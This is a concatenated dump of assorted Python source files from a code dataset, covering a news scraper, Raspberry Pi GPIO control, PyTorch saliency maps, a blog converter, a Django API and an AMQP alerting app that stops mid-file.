print(target_words)\n\n","sub_path":"NMT_data_preperation.py","file_name":"NMT_data_preperation.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448148367","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nfrom natasha import NamesExtractor\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = []\r\ntitles = []\r\ndic = {}\r\n\r\nextractor = NamesExtractor()\r\nr = requests.get('https://yandex.ru/news/export')\r\nhtml = BeautifulSoup(r.content, \"html.parser\")\r\ndata = html.find_all('a', class_=\"link link_theme_normal i-bem\")\r\nfor i in range(len(data)):\r\n data[i] = str(data[i])\r\n index1 = data[i].find(\"href\", 0, len(data[i]))\r\n index2 = data[i].find(\"rss\", 0, len(data[i]))\r\n r = requests.get(data[i][index1 + 6:index2 + 3])\r\n data[i] = BeautifulSoup(r.content, \"html.parser\")\r\n data[i] = str(data[i].findAll('title'))\r\n titles.append(extractor(data[i]))\r\n for match in titles[i]:\r\n start, stop = match.span\r\n if (dic.get(data[i][start:stop], -1) == -1):\r\n dic[data[i][start:stop]] = 1\r\n else:\r\n dic[data[i][start:stop]] += 1\r\ngis = plt.subplot()\r\ngis.bar(dic.keys(), dic.values())\r\nplt.show()\r\n","sub_path":"news_collection.py","file_name":"news_collection.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"420870279","text":"#!/usr/bin/python3\n\nimport pigpio # using this for hardware PWM, software is not stable!!!\nimport signal\nimport time\nimport math\nimport signal\nimport RPi.GPIO as GPIO # using RPi.GPIO for non-PWM\nimport random\n\n# GPIO pin numbers\nSTR = 17\nDATA = 27\nCLK = 22\nPWM_PIN = 12\nPWM_FREQ = 400 # frequency of PWM\nCHANNELS = 32; # number of output channels\nFPS = 30; # main refresh rate = frames per second\ncounter = 0\nvalue = 0b11111111111111111111111111111111 # testing purposes\n\n\nPWM = pigpio.pi()\nif not PWM.connected:\n\texit()\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(STR, GPIO.OUT, initial=GPIO.LOW) # make pin into an output\nGPIO.setup(DATA, GPIO.OUT, initial=GPIO.LOW) # make pin into an output\nGPIO.setup(CLK, GPIO.OUT, initial=GPIO.LOW) # make pin into an output\n\ndef regClear():\n\tGPIO.output(DATA, 0)\n\tfor i in range(CHANNELS):\n\t\tGPIO.output(CLK, 0)\n\t\tGPIO.output(CLK, 1)\n\tGPIO.output(CLK, 0)\n\tGPIO.output(STR, 1)\n\tGPIO.output(STR, 0)\n\ndef regOutput(value):\n\tfor i in range(CHANNELS):\n\t\tGPIO.output(CLK, 0)\n\t\tGPIO.output(DATA, value >> (CHANNELS - i - 1) & 1)\n\t\tGPIO.output(CLK, 1)\n\tGPIO.output(CLK, 0)\n\tGPIO.output(STR, 1)\n\tGPIO.output(STR, 0)\n\tGPIO.output(DATA, 0)\n\ndef keyboardInterruptHandler(signal, frame):\n\tprint()\n\tprint(\"KeyboardInterrupt (ID: {}) has been caught. Cleaning up...\".format(signal))\n\tregClear()\n\tGPIO.cleanup()\n\tPWM.hardware_PWM(PWM_PIN, PWM_FREQ, 0)\n\tPWM.stop()\n\texit(0)\n\ndef main():\n\n\tprint(\"Ctrl C to quit\")\n\n\tglobal counter\n\tglobal value\n\n\tregClear()\n\n\twhile True:\n\n\t\tregOutput( 1 << (counter % 32) )\n\n\t\tif (counter % 300 == 150):\n\t\t\tPWM.hardware_PWM(PWM_PIN, PWM_FREQ, 1000000 )\n\t\telif (counter % 300 == 0):\n\t\t\tPWM.hardware_PWM(PWM_PIN, PWM_FREQ, 100000 )\n\n\t\tcounter += 1\n\t\ttime.sleep(1)\n\nsignal.signal(signal.SIGINT, keyboardInterruptHandler)\n\nmain()","sub_path":"Python/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360792806","text":"# Modules\nimport os\nimport csv\n\n#Set up path for file\ncsvpath=os.path.join(\"..\", \"Resources\", \"budget_data.csv\" )\n#print(csvpath)\n\ntotal_months=0\ntotal_profit=0\nprevious_value=0\ncurrent_value=0\nlist_changes=[]\nlist_dates=[]\n\nprint(\"Financial Analysis\")\nprint(\"---------------------\")\n\n#Open the csv file\nwith open(csvpath, newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n#print(csvreader)\n\n#Read the header row\n csv_header=next(csvreader)\n#print(f\"CSV Header: {csv_header}\")\n\n#Read each row of data after the header\n for row in csvreader:\n\n #Determine total number of months\n total_months=total_months+1\n #current_value=(row[0])\n\n #Determine total profit over entire period\n total_profit=total_profit+int(row[1])\n current_value=int(row[1])\n\n # Calculate the average of the changes in Profit/Lossess over the entire period, first calculate change\n monthly_diff=current_value-previous_value\n \n #Store changes in list\n list_changes.append(monthly_diff)\n \n #Store dates in list\n list_dates.append(row[0])\n \n previous_value=current_value\n #avg_monthly_diff=sum[list_changes]\n\ndel list_changes[0]\ndel list_dates[0]\n#print(list_changes)\n#print(list_dates)\n\n# Calculate the average of the changes in Profit/Lossess over the entire period\naverage = sum(list_changes) / len(list_changes)\n\n# Determine the greatest increase in profits (date and amount) over the entire period\nmaximum=list_changes.index(max(list_changes))\n\n# Determine the greatest decrease in losses (datea and amount) ove the entire period\nminimum=list_changes.index(min(list_changes))\n\nprint(\"Total Months: \" + str(total_months))\nprint(\"Total: $\"+str(total_profit))\nprint(\"Average Change: $\" +str(round(average, 2)))\nprint(\"Greatest Increase in Profits: \" + str(list_dates[maximum]) +\" \"+str(list_changes[maximum]))\nprint(\"Greatest Decrease in Profits: \" + str(list_dates[minimum]) +\" \"+ str(list_changes[minimum]))\n#print(list_changes)\n\n#print(row)","sub_path":"PyBank/Homework/main_1.py","file_name":"main_1.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"74518575","text":"# coding=utf-8\r\n\r\n\"\"\"\r\n309. Best Time to Buy and Sell Stock with Cooldown My Submissions QuestionEditorial Solution\r\nTotal Accepted: 13833 Total Submissions: 37785 Difficulty: Medium\r\nSay you have an array for which the ith element is the price of a given stock on day i.\r\n\r\nDesign an algorithm to find the maximum profit. You may complete as many transactions as you like (ie, buy one and sell one share of the stock multiple times) with the following restrictions:\r\n\r\nYou may not engage in multiple transactions at the same time (ie, you must sell the stock before you buy again).\r\nAfter you sell your stock, you cannot buy stock on next day. (ie, cooldown 1 day)\r\nExample:\r\n\r\nprices = [1, 2, 3, 0, 2]\r\nmaxProfit = 3\r\ntransactions = [buy, sell, cooldown, buy, sell]\r\nhttps://discuss.leetcode.com/topic/31349/7-line-java-only-consider-sell-and-cooldown\r\n\"\"\"\r\n\r\n\r\nclass Solution(object):\r\n def maxProfit(self, prices):\r\n \"\"\"\r\n :type prices: List[int]\r\n :rtype: int\r\n \"\"\"\r\n if prices is None or len(prices) <= 1:\r\n return 0\r\n if len(prices) == 2:\r\n return max(prices[1] - prices[0], 0)\r\n profit1 = 0\r\n profit2 = 0\r\n for i in range(1, len(prices)):\r\n copy = profit1\r\n profit1 = max(profit1 + prices[i] - prices[i - 1], profit2)\r\n profit2 = max(copy, profit2)\r\n\r\n return max(profit1, profit2)\r\n\r\n\r\nif __name__ == '__main__':\r\n print ((Solution().maxProfit([1, 2, 3, 0, 2, 4])))\r\n","sub_path":"zishell/solution/medium/solution309_maxProfit.py","file_name":"solution309_maxProfit.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347635577","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*\nfrom os.path import basename\nfrom unittest import main, TestCase\nfrom assert_is import *\nfrom pgvcsddl import ddl, parent_path\n\n\nclass Test(TestCase):\n def test(self):\n path=\"SCHEMA/public/TABLE/tablename\"\n oid=88\n sql=\"sql\"\n _ddl=ddl(path=path,oid=oid,sql=sql)\n eq_(_ddl.files[\"%s.oid\" % path],oid)\n eq_(_ddl.files[\"%s.sql\" % path],sql)\n refs=[parent_path(path)]\n eq_(_ddl.files[\"%s.references\" % path],\"\\n\".join(refs))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tests/ddl/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"176660686","text":"__author__ = \"Poonam Yadav\"\n__copyright__ = \"Copyright 2017, The Databox Project\"\n__credits__ = [\"Databox team\"]\n__license__ = \"GPL\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"Poonam Yadav\"\n__email__ = \"p.yadav@acm.org\"\n__status__ = \"Development\"\n\n#This code is setup for testing python library outside databox. Inside Databox, STORE_URI Will be extrated from env DATABOX_ZMQ_ENDPOINT.\n# ARBITER URI will be drived from that as well (todo)\n\nimport sys\nfrom flask import Flask\nimport ssl\nimport os\nimport time\n\nsys.path.insert(1, '../')\nfrom lib import core_store as databox #main function as providing the storeclient of core store.\nfrom lib import config as config\nimport datetime as datetime\n\nTEST_STORE_URI = os.environ.get('DATABOX_ZMQ_ENDPOINT') or \"tcp://127.0.0.1:5555\"\nTEST_ARBITER_URI = os.environ.get('DATABOX_ARBITER_ENDPOINT') or \"tcp://127.0.0.1:4444\"\nDATA_SOURCE_ID = str(datetime.date.today())\n\n#newKVStore = databox.newKeyValueClient(TEST_STORE_URI, TEST_ARBITER_URI, False)\n#res = newKVStore.write(\"testdata1\", 'KeyWrite', '{\\\"TEST\\\": \\\"data\\\"}', 'JSON')\n#res = newKVStore.read(\"testdata1\", 'KeyWrite','JSON')\n#print(\"Read data from store \" + str(res))\n\nnewTSStore = databox.newTimeSeriesBlobClient(TEST_STORE_URI, TEST_ARBITER_URI, False)\ntimeline = databox.newDataSourceMetadata()\ntimeline['Description'] = 'Twitter user timeline data'\ntimeline['ContentType'] = 'application/json'\ntimeline['Vendor'] = 'Databox Inc.'\ntimeline['DataSourceType'] = 'testdata1'\ntimeline['DataSourceID'] = 'testdata1'\ntimeline['StoreType'] = 'ts'\n\ntry:\n newTSStore.RegisterDatasource(timeline)\nexcept ValueError:\n print(\"error in registoring datastore\")\ncat = newTSStore.GetDatasourceCatalogue()\n\nres = newTSStore.write('testdata1','{\\\"idx\\\": \\\"16\\\"}', contentFormat ='JSON')\n\nres1 = newTSStore.latest('testdata1')\nif(res1):\n print(\"Data res1 latest from the store \" + str(res1))\n\nres2 = newTSStore.earliest('testdata1')\nif(res2):\n print(\"Data res2 earliest from the store \" + str(res2))\n\nres = newTSStore.write('testdata1','{\\\"idx\\\": \\\"17\\\"}', contentFormat ='JSON')\n\nres3 = newTSStore.lastN('testdata1', 1)\nif(res3):\n print(\"Data res3 last 1 from the store \" + str(res3))\n\nres4 = newTSStore.lastN('testdata1', 2)\nif(res4):\n print(\"Data res4 last 2 from the store \" + str(res4))\n\nres5 = newTSStore.since('testdata1', 1570575084924)\nif(res5):\n print(\"Data res5 since the time<1570575084924> from the store \" + str(res5))\n\n\nres6 = newTSStore.range('testdata1', 1570575084924, 1570575441326)\nif(res6):\n print(\"Data res6 in range<1570575084924, 1570575441326> from the store \" + str(res6))\n\n\nres7 = newTSStore.writeAt('testdata1',1570575084925,'{\\\"idx\\\": \\\"20\\\"}')\n\nres8 = newTSStore.latest('testdata1')\n\nif(res8):\n print(\"Data res8 lastest from the store \" + str(res8))\n\n\n#app = Flask(__name__)\n#credentials = config.getHttpsCredentials()\n#fp_cert = open(os.path.abspath(\"certnew.pem\"), \"w+\")\n#fp_cert.write(str(credentials['cert']))\n#fp_cert.close()\n\n#fp_key = open(os.path.abspath(\"keynew.pem\"), \"w+\")\n#fp_key.write(str(credentials['key']))\n#fp_key.close()\n\n#ctx = ('certnew.pem', 'keynew.pem')\n\n#@app.route(\"/ui\")\n#def hello():\n# return \"Hello World!\"\n\n#if __name__ == \"__main__\":\n# print(\"A Databox Driver\")\n #time.sleep(500)\n #app.run(host='0.0.0.0', port=8080, ssl_context=ctx)\n\n","sub_path":"python/driver/drivertest.py","file_name":"drivertest.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262890362","text":"#!/usr/bin/python3\n\"\"\"\nSet of functions used to call a series of algorithms used to visualize the object localization of a pre-trained \nnetwork in PyTorch. The different algorithms are discussed in several papers, while the implementation is based, \nroughly, on work in the following repository (https://github.com/sar-gupta/weakly-supervised-localization-survey)\n\"\"\"\n\nimport numpy as np\nimport PIL\n\n\nimport torch\nimport torchvision\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\ndef saliency_map_general(model, input, label, plot = False):\n \"\"\"\n saliency_map_general: implementation to return the most general form of the saliency map, informing\n on the regions of interest that activate a specific label.\n Args:\n - model: (PyTorch) Trained model trying to understand \n - input: Image to be classfied and understood, passed as a PyTorch tensor (C x W x H)\n - label: Class to identify the regions of interest\n return: numpy array with heatmap data\n \"\"\"\n input = Variable(input.unsqueeze_(0),requires_grad = True)\n output = model.forward(input)\n model.zero_grad()\n\n output[0][label].backward()\n\n grads = input.grad.data.clamp(min=0)\n grads.squeeze_()\n grads.transpose_(0,1)\n grads.transpose_(1,2)\n grads = np.amax(grads.cpu().numpy(), axis=2)\n \n grads -= grads.min()\n grads /= grads.max()\n \n grads *= 255\n grads = grads.astype(int)\n \n return grads\n\n\ndef guided_saliency_map(model, input, label, plot = False):\n \"\"\"\n guided_saliency_map: implementation to return a guided saliency map, informing\n on the regions of interest that activate a specific label.\n Args:\n - model: (PyTorch) Trained model trying to understand \n - input: Image to be classfied and understood, passed as a PyTorch tensor (C x W x H)\n - label: Class to identify the regions of interest\n return: numpy array with heatmap data \n \"\"\"\n input = Variable(input.unsqueeze_(0), requires_grad=True)\n \n try:\n h = [0]*len(list(model.modules()))\n\n def hookfunc(module, gradInput, gradOutput):\n return tuple([(None if g is None else g.clamp(min=0)) for g in gradInput])\n\n for j, i in enumerate(list(model.modules())):\n h[j] = i.register_backward_hook(hookfunc)\n\n output = model.forward(input)\n model.zero_grad()\n\n\n output[0][label].backward()\n\n for i in range(len(list(model.modules()))):\n h[i].remove()\n except Exception as e:\n print(e)\n for i in range(len(list(model.modules()))):\n h[i].remove()\n \n grads = input.grad.data.clamp(min=0)\n grads.squeeze_()\n grads.transpose_(0,1)\n grads.transpose_(1,2)\n grads = np.amax(grads.cpu().numpy(), axis=2)\n \n grads -= grads.min()\n grads /= grads.max()\n \n grads *= 255\n grads = grads.astype(int)\n\n return grads\n\ndef gradcam(model, input, label, layer_name, plot=False):\n \"\"\"\n gradcam: implementation to return a class activation map using the gradient of class score with each \n of last conv layer filters. Calculate weighted sum of gradients and filters to finally obtain a map \n of size equal to size of filters.\n Args:\n - model: (PyTorch) Trained model trying to understand \n - input: Image to be classfied and understood, passed as a PyTorch tensor (C x W x H)\n - label: Class to identify the regions of interest\n - layer_name: Name of the layer to target, should be the last CNN.\n return:\n PIL image with cativation map\n \"\"\"\n imgs_shape = (input.shape[1], input.shape[2])\n rs = torchvision.transforms.Resize( imgs_shape )\n\n #find the right layer\n last_conv = None\n for name, item in model._modules.items():\n if name == layer_name:\n last_conv = item\n\n if last_conv == None:\n print('Cant find target layer')\n return None\n\n pre_image = input\n global gcdata\n global gcgrads\n\n def bhook(module, gradInputs, gradOutputs):\n global gcgrads\n gcgrads = gradOutputs\n\n def fhook(module, input, output):\n global gcdata\n gcdata = output\n \n hb = last_conv.register_backward_hook(bhook)\n hf = last_conv.register_forward_hook(fhook)\n \n out = model(input.unsqueeze_(0))\n model.zero_grad()\n out[0, label].backward()\n \n hb.remove()\n hf.remove()\n \n gcdata = gcdata[0]\n gcgrads = gcgrads[0].squeeze()\n \n gcgrads = gcgrads.mean(dim=2, keepdim=True)\n gcgrads = gcgrads.mean(dim=1, keepdim=True)\n #\n gcdata = gcdata.mul(gcgrads)\n gcdata = gcdata.sum(dim=0, keepdim=True)\n gcdata = gcdata.clamp(min=0)\n \n gcdata -= gcdata.min()\n gcdata /= gcdata.max()\n\n toi = torchvision.transforms.ToPILImage()\n gcdata = np.array(rs(toi(gcdata.data.cpu())))\n\n input.squeeze()\n \n return gcdata\n\ndef guided_gradcam(model, input, label,layer_name, plot = False):\n \"\"\"\n guided_gradcam: returns a combination of a guided saliency map and class activation map. this combines \n the sensitivity to different classes from gradcam toguether with the greater resolution of the\n saliency map.\n Args:\n - model: (PyTorch) Trained model trying to understand \n - input: Image to be classfied and understood, passed as a PyTorch tensor (C x W x H)\n - label: Class to identify the regions of interest\n - layer_name: Name of the layer to target, should be the last CNN.\n return:\n PIL image with cativation map\n \"\"\"\n gc = gradcam(model, input, label, layer_name, plot=False)\n\n guided = guided_saliency_map(model=model, input=input[0], label=label, plot=False)\n gc = gc * guided\n \n rs = torchvision.transforms.Resize((32,32))\n\n \n gc -= gc.min()\n gc = np.divide(gc, gc.max())\n gc *= 255\n gc = gc.astype(int)\n\n return gc\n\ndef smooth_guided_saliency_map(model, input, label, transform,x=10, percent_noise=10, plot = True):\n \"\"\"\n smooth_guided_saliency_map: Implementation of guided saliency map accounting for the fact \n small, local variations in the local derivatives lead to the apparent noise one sees. This implementation smooths\n these.\n Args:\n - model: (PyTorch) Trained model trying to understand \n - input: Image to be classfied and understood, passed as a PyTorch tensor (C x W x H)\n - x: Number fo times to sample for the smoothing\n - percent_nois: Percentage of noise to be itroduced during sampling for smoothing\n return:\n PIL image with cativation map\n \"\"\"\n tensor_input = input\n \n final_grad = torch.zeros(input.shape).cuda()\n final_grad = final_grad.unsqueeze(0)\n \n h = [0]*len(list(model.modules()))\n\n def hookfunc(module, gradInput, gradOutput):\n return tuple([(None if g is None else g.clamp(min=0)) for g in gradInput])\n\n for j, i in enumerate(list(model.modules())):\n h[j] = i.register_backward_hook(hookfunc)\n \n for i in range(x):\n temp_input = tensor_input\n noise = torch.from_numpy(np.random.normal(loc=0, scale=(percent_noise/100) * \n (tensor_input.max() - tensor_input.min()), \n size=temp_input.shape)).type(torch.cuda.FloatTensor)\n temp_input = (temp_input.cuda() + noise).cpu().numpy()\n temp_input = np.transpose(temp_input, (1,2,0) )\n temp_input = PIL.Image.fromarray(temp_input.astype(np.uint8))\n temp_input = Variable(transform(temp_input).unsqueeze(0).cuda(), requires_grad=True)\n\n output = model.forward(temp_input)\n model.zero_grad()\n output[0][label].backward()\n final_grad += temp_input.grad.data\n \n for i in range(len(list(model.modules()))):\n h[i].remove()\n \n grads = final_grad/x\n grads = grads.clamp(min=0)\n grads.squeeze_()\n grads.transpose_(0,1)\n grads.transpose_(1,2)\n grads = np.amax(grads.cpu().numpy(), axis=2)\n \n grads -= grads.min()\n grads /= grads.max()\n \n grads *= 255\n grads = grads.astype(int)\n\n return grads\n\ndef smooth_guided_gradcam(model, input, label, transform, layer_name, plot = False ):\n guided = smooth_guided_saliency_map(model, input, label,transform = transform, plot = False)\n gc = gradcam(model, input, label, layer_name = layer_name, plot=False)\n gc = gc * guided\n \n rs = torchvision.transforms.Resize((32,32))\n\n \n gc -= gc.min()\n gc = np.divide(gc, gc.max())\n gc *= 255\n gc = gc.astype(int)\n\n return gc\n","sub_path":"Utils/visualize_object_survey.py","file_name":"visualize_object_survey.py","file_ext":"py","file_size_in_byte":8615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179635448","text":"# html to markdown\n# tistory(hmtl) 블로그를 github(markdown) 블로그로 옮기는 자동화 작업\n\n# 참고 자료\n# https://kimdoky.github.io/python/2017/06/12/python-urllib.html\n# https://jungwoon.github.io/python/crawling/2018/04/12/Crawling-2/\n# convert HTML to Markdown (https://www.browserling.com/tools/html-to-markdown)\n# python-markdownify (https://github.com/matthewwithanm/python-markdownify)\n\nfrom selenium import webdriver as wd\nfrom bs4 import BeautifulSoup as bs\n\n# Convert HTML to Markdown\nfrom markdownify import markdownify as md\n\nimport os\nimport urllib.request as req\n\n# 절대적 대기\nimport time\n\n# 선수 데이터\nmain_url = \"https://pakpark.tistory.com/\"\nstart = \"6\"\n\n# 드라이버 로드\ndriver = wd.Chrome(executable_path='/Users/parkyounghwan/git/Crawling/BlogTransfer/chromedriver')\n\n# 사이트 접속\ndriver.get(main_url + start)\n\narticle = driver.find_element_by_css_selector('#cMain>#mArticle')\n\n# 제목 찾기\ntitle = article.find_element_by_css_selector('.area_title>h3').text\ntitle = title.replace(' ', '-')\n\n# 카테고리 나누기\nif title.find('[') == 0:\n category = title[title.find('[') + 1:title.find(']')]\nelse:\n category = 'pakpark'\n\n# 날짜 찾기\nuserDateInfo = article.find_element_by_css_selector('.area_title>.info_post').text\ndate = userDateInfo[14:25]\ndate = date.replace(\".\", \"-\")\n\n# 내용 찾기\nsite = bs(req.urlopen(main_url + start), \"html.parser\")\narticle = site.find(\"div\", {\"class\":\"area_view\"})\n\ncontent = \"\"\nfor tag in article.findAll(\"p\"):\n content += md(str(tag)) # html to markdown\n\n# 지킬 content 형식\njekyllform = '''---\nlayout: post\ntitle: input-title\ndate: input-date\ncategories: pakpark\ncomments: false\n---\n\n'''\n\njekyllform = jekyllform.replace('input-title', '\"' + title + '\"')\njekyllform = jekyllform.replace('input-date', date)\n\nif category != 'pakpark':\n jekyllform = jekyllform.replace('pakpark', category)\n\n# 파일 이름\nfilename = date + \"-\" + title\nfilename = filename.replace(\" \", \"\")\n\n# 파일 저장 (디렉터리 확인 -> (디렉터리 생성))\ndir_path = '/Users/parkyounghwan/git/parkyounghwan.github.io/_posts/'\n\ntry:\n if not os.path.exists(dir_path + category):\n os.makedirs(os.path.join(dir_path + category))\n print(\"디렉토리 생성: \", category)\n\n dir_path += category\nexcept OSError as e:\n if e.errno != errno.EEXIST:\n print(\"Failed to create directory!!!!\")\n raise\n\n# 파일 쓰기(write)\nfile_path = os.path.join(dir_path, filename + '.md')\nfid = open(file_path, 'w')\n\nif os.path.isfile(file_path):\n fid.write(jekyllform)\n fid.write(content)\n\nfid.close()\n\n# 다음 사이트 접속\n\n# 절대적 대기\ntime.sleep(3)\n\n# 종료\ndriver.close()\ndriver.quit()","sub_path":"BlogTransfer/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386892405","text":"#!/usr/local/bin/python3\n# -*- coding: UTF-8 -*-\n\nimport requests\n\ntaskListURL = 'http://pm.jieniu.cc/issues?assigned_to_id=me&set_filter=1&sort=priority%3Adesc%2Cupdated_on%3Adesc'\n\ndef close():\n\tresponse = requests.get(taskListURL)\n\tprint(response.json())\n\nif __name__ == '__main__':\n\tclose()\n","sub_path":"Util/ClosePMTask.py","file_name":"ClosePMTask.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575922303","text":"from django.http import JsonResponse, QueryDict\nfrom django.utils import timezone\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom chat_bot.models import Dictionary\n\nimport json\n\n@csrf_exempt\ndef dictionaries(request):\n if request.method == \"GET\":\n _dictionaries = Dictionary.objects.all()\n\n # hanle bot_id\n if 'bot_id' in request.session:\n bot_id = request.session['bot_id']\n _dictionaries = _dictionaries.filter(bot_id__exact=bot_id)\n\n return JsonResponse(list(_dictionaries.values()), safe=False)\n elif request.method == \"POST\":\n params = json.loads(request.body)\n Dictionary.objects.create(\n bot_id=bot_id,\n word=params.get(\"word\"),\n synonym=params.get(\"synonym\"),\n created_time=timezone.now()\n )\n return JsonResponse({\"status\": 200}, safe=False)\n\n\n@csrf_exempt\ndef dictionary_detail(request, id):\n if request.method == 'GET':\n _dictionaries = list(Dictionary.objects.filter(id=id).values())\n\n if not _dictionaries:\n return JsonResponse(None, safe=False)\n\n return JsonResponse(_dictionaries[0], safe=False)\n elif request.method == \"PUT\":\n params = json.loads(request.body)\n dictionary = Dictionary.objects.get(id=id)\n dictionary.word = params.get('word')\n dictionary.synonym = params.get('synonym')\n dictionary.updated_time = timezone.now()\n dictionary.save()\n return JsonResponse({\"status\": 200}, safe=False)\n elif request.method == \"DELETE\":\n dictionary = Dictionary.objects.get(id=id)\n dictionary.delete()\n return JsonResponse({\"status\": 200}, safe=False)\n\n","sub_path":"tdai/api/views/view_dictionary.py","file_name":"view_dictionary.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17654673","text":"#!/usr/bin/env python3\n\n# Libraries\nimport time\nimport pika\nimport ot_data_pb2\nimport hiota_message_pb2\nimport common_pb2\nimport os\nimport json\nfrom datetime import datetime\nfrom influxdb import InfluxDBClient\nimport urllib3\nimport hiota_alert\n\n# Disable the warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# Configurables\nrabbit_username = str(os.environ['AMQP_USERNAME'])\nrabbit_password = str(os.environ['AMQP_PASSWORD'])\namqp_broker = str(os.environ['AMQP_HOSTNAME'])\namqp_port = int(os.environ['AMQP_PORT'])\ndebug = int(os.environ['AMQP_DEBUG_BOOLEAN'])\nthreshold_value = float(os.environ[\"THRESHOLD_VALUE\"])\ntrace_id = str(os.environ['TRACE_ID'])\ninput_binding_key = str(os.environ['INPUT_BINDING_KEY'])\ninput_queue = str(os.environ['INPUT_QUEUE'])\noutput_binding_key = str(os.environ['OUTPUT_BINDING_KEY'])\nexchange_name = str(os.environ[\"EXCHANGE_NAME\"])\ndiscard_alert_value = int(os.environ[\"DISCARD_ALERT_VALUE\"])\nsave_to_influx = int(os.environ[\"STORE_ALERTS\"])\ninflux_hostname = str(os.environ[\"DEMO_INFLUX_HOSTNAME\"])\ninflux_port = int(os.environ[\"DEMO_INFLUX_PORT\"])\ninflux_username = str(os.environ[\"INFLUX_USERNAME\"])\ninflux_password = str(os.environ[\"INFLUX_PASSWORD\"])\ndata_source = str(os.environ[\"SOURCE\"])\ndata_to_process = str(os.environ[\"DATA_MODEL\"])\ndatabase = str(os.environ[\"DATA_BASE_NAME\"])\nalerts_table = str(os.environ[\"ALERTS_TABLE_NAME\"])\nseverity_level = int(os.environ[\"ALERT_SEVERITY\"])\n\n# Create a handler to process each message as it comes in\ndef processmessage(ch, method, properties, body):\n\n if debug:\n print(\"Processing a message.\")\n\n # Recieve the message and parse out the data\n message = hiota_message_pb2.HiotaMessage()\n message.ParseFromString(body)\n pay_load = (hiota_message_pb2.HiotaMessage(id=message.id, created=message.created, trace_id=[trace_id], ot_data=message.ot_data))\n\n if debug:\n print(pay_load)\n\n # Handle roll, pitch, yaw data from iPhone\n if data_source == \"iphone\" and data_to_process == \"json\":\n # Get the value\n json_data = json.loads(message.ot_data.data_point.value.binary)\n\n try:\n yaw = json_data[\"yaw\"]\n roll = json_data[\"roll\"]\n pitch = json_data[\"pitch\"]\n\n # Debug\n if debug:\n print(json_data)\n\n # If the user wants to discard the alerted value\n if abs(yaw) > threshold_value or abs(roll) > threshold_value or abs(pitch) > threshold_value:\n # Log the value out to the terminal\n alert_msg = \"ALERT!! The absolute value is over \" + str(threshold_value) + \\\n \". Current values are (yaw: \" + str(yaw) + \", roll: \" + str(roll) + \", pitch: \" + \\\n str(pitch) + \")\"\n print(alert_msg)\n hiota_alert.hiota_alert_message_pop(alert_msg, severity=severity_level)\n # If the user wants to save the data to an influx table\n if save_to_influx:\n # Create local time variable\n local_time = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n # Switch to Database\n client.switch_database(database)\n # Influx data\n influx_data = [\n {\n \"measurement\": alerts_table,\n \"tags\": {},\n \"time\": local_time,\n \"fields\": {\n \"yaw\": yaw,\n \"roll\": roll,\n \"pitch\": pitch\n }\n }\n ]\n # Write the data to influx\n client.write_points(influx_data)\n except KeyError:\n print(\"Data does not include 'yaw,' 'pitch,' and 'roll.' Your configuration is set up to read iPhone-JSON data for yaw, pitch, and roll.\")\n\n # Handle data coming from the data pump in xhiota format\n elif data_source == \"datapump\":\n # Get the value\n value = message.ot_data.data_point.value.sint64\n\n # Debug\n if debug:\n print(pay_load)\n\n # If the user wants to discard the alerted value\n if value > threshold_value:\n # Log the value out to the terminal\n alert_msg = \"ALERT!! The value is over \" + str(threshold_value) + \". Current value is \" + str(value)\n print(alert_msg)\n hiota_alert.hiota_alert_message_pop(alert_msg, severity=severity_level)\n if not discard_alert_value:\n # Serialize the payload (must use Protobuf serialization)\n pay_load = pay_load.SerializeToString()\n # Publish the message back to the Lumada system so it can be sent to the database\n channel.basic_publish(exchange=exchange_name, routing_key=output_binding_key, body=pay_load)\n else:\n # Serialize the payload (must use Protobuf serialization)\n pay_load = pay_load.SerializeToString()\n # Publish the message back to the Lumada system so it can be sent to the database\n channel.basic_publish(exchange=exchange_name, routing_key=output_binding_key, body=pay_load)\n\n# Connect to RabbitMQ AMQP instance\ncredentials = pika.PlainCredentials(username=rabbit_username, password=rabbit_password)\nconnection_params = pika.ConnectionParameters(host=amqp_broker, port=amqp_port, credentials=credentials, connection_attempts=5, socket_timeout=5, ssl=True)\n\n# Create a client to connect with Influxdb\nclient = InfluxDBClient(host=influx_hostname, port=influx_port, username=influx_username, password=influx_password, ssl=True, verify_ssl=False)\n\n# Infinite loop\ntry:\n\n if debug:\n print(\"Threshold app starting.\")\n\n connection = pika.BlockingConnection(connection_params)\n channel = connection.channel()\n\n if debug:\n print(\"Pika connections set.\")\n\n # Create a queue and bind to it\n channel.queue_declare(queue=input_queue)\n 